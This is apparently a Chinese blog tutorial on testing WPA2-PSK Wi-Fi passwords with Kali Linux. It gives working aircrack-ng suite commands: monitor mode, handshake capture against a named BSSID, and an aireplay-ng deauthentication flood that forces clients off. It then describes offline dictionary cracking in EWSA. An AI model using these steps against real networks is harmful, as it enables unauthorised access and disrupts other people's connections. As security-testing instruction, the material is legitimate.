admin管理员组文章数量:1574959
注意!本篇文章仅供学习使用!未经允许不得转载或用作他用!注意!本篇文章仅供学习使用!未经允许不得转载或用作他用!注意!本篇文章仅供学习使用!未经允许不得转载或用作他用!
1.2 WEP与WPA2-PSK密码的安全测试
1.2.1WEP(有线等效加密)
WEP加密在无线网络中传输的数据是使用一个随机产生的密钥来加密的,且WEP的密钥产生方式很易被预测,易于破解。
1.2.2WPA2-PSK
1.2.2.1暴力破解法
破解wpa和wpa2加密的WiFi网络的基本原理通俗来讲,我们需要先在无线网卡监听模式下搜集目标WiFi的信息,例如ssid(WiFi名称)、BSSID(也就是目标WiFi无线路由器的MAC)、已连接的客户端mac、信号强度等信息。然后发送伪造的取消关联的数据包迫使已连接到该WiFi的客户端与WiFi断开连接,重点是,断开连接后,客户端会重新尝试发起连接到该WiFi网络,这时客户端会发送一个带有认证密码的数据包以便请求重新连入WiFi,这个包俗称为握手包。这时我们的攻击机利用攻击程序和无线网卡监听抓取到这个握手包,这个握手包里就含有WiFi密码,但这个密码当然是经过加密的,所以后续就需要我们使用攻击程序调用密码字典结合获取到的BSSID、客户端MAC等信息进行运算,不断运算字典中的每一个密码,直到有一个密码使用wpa算法能算出一个与抓到的握手包中一致的加密字串,这个就是目标WiFi的密码了。如果把字典里的每一个密码都算过一遍仍然没有一个与抓取到的握手包加密字串一致的,就破解失败,退出,构造新的字典再试。使用kali系统进行抓包Kali Linux 预装了数百个安全工具,包括用于 Wi-Fi 破解的工具,如 Aircrack-ng、Aireplay-ng、Wifite 等。
1.2.2.2使用kali终端中的 iwconfig列出网卡信息
iwconfig
在 Linux 系统中用来配置和显示无线网络接口的命令行工具
网卡信息展示
1.2.2.3使用kali终端中的airmon-ng start wlan0开启网卡监控
airmon-ng start wlan0
作用是启动或重新启动名为 wlan0 的无线网络接口的监控模式
网卡信息展示
1.2.2.4再次使用kali终端中的 iwconfig列出网卡信息
iwconfig
可以看到此处的wlan0mon网卡的状态变为监控模式:命令将无线接口置于监控模式,允许捕获所有无线流量。
网卡信息展示
1.2.2.5使用kali终端中的airodump-ng wlan0mon扫描WIFI信号
airodump-ng wlan0mon
这个命令,正在告诉 airodump-ng 去捕获 wlan0mon 接口上的无线网络流量。
扫描到的WIFI信号信息展示
1.2.2.6使用kali终端中的命令
airodump-ng -c 信道 –bssid BSSID wlan0mon -w 握手包名称
用于无线网络分析
airodump-ng -c 11 --bssid BE:29:98:5B:9C:BD wlan0mon -w cv1s
##这里的-c 11代表目标路由器的信道为11
##BE:29:98:5B:9C:BD 是指目标路由器的MAC地址
##-w cv1s 是指将后续抓到的握手包写入名为cv1s的.cap文件中
使用 airodump-ng 进行无线网络分析和捕获,以抓取目标wifi的设备连接情况,并保存到指定的.Cap文件以用于后续的操作
扫描到的WIFI设备连接情况展示
1.2.2.7新开终端使用kali终端中的命令
##aireplay-ng -0 100 -a WIFI设备MAC地址 -c 连接设备的MAC地址 wlan0mon
aireplay-ng -0 100 -a BE:29:98:5B:9C:BD -c 6E:82:89:B6:F1:B1 wlan0mon
这个命令的目的是向指定的接入点和客户端发送伪造的解认证包,迫使客户端断开与接入点的连接。
输入后情况展示
显示抓包成功信息
显示抓包成功展示
1.2.2.8通过U盘下载.cap握手包到本机EWSA进行破解
因为kali系统中的权限问题,所以只能通过U盘下载的方式进行握手包下载。
EWSA导入握手包后界面如图
EWSA导入握手包后界面
EWSA准备破解界面
1.2.2.9破解成功!
通过跑字典进行破解,成功找到密码!
EWSA破解成功界面
1.2.3总结
在进行WIFI扫描时要时刻注意,不能随意破解他人网络,导致问题发生。
1.3 总结
本章测试报告针对部分功能的结果做出展示。通过进行功能测试,可以发现许多细节性问题和不易察觉的问题,将测试进行良好设计和执行可以帮助程序变得更加完善且实用,同时也运行了wpa2的破解问题,现阶段仍然处于暴力破解方面。
注意!本篇文章仅供学习使用!未经允许不得转载或用作他用!
版权声明:本文标题:安全测试之WPA2-PSK的密码测试 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dongtai/1727780826a1129298.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论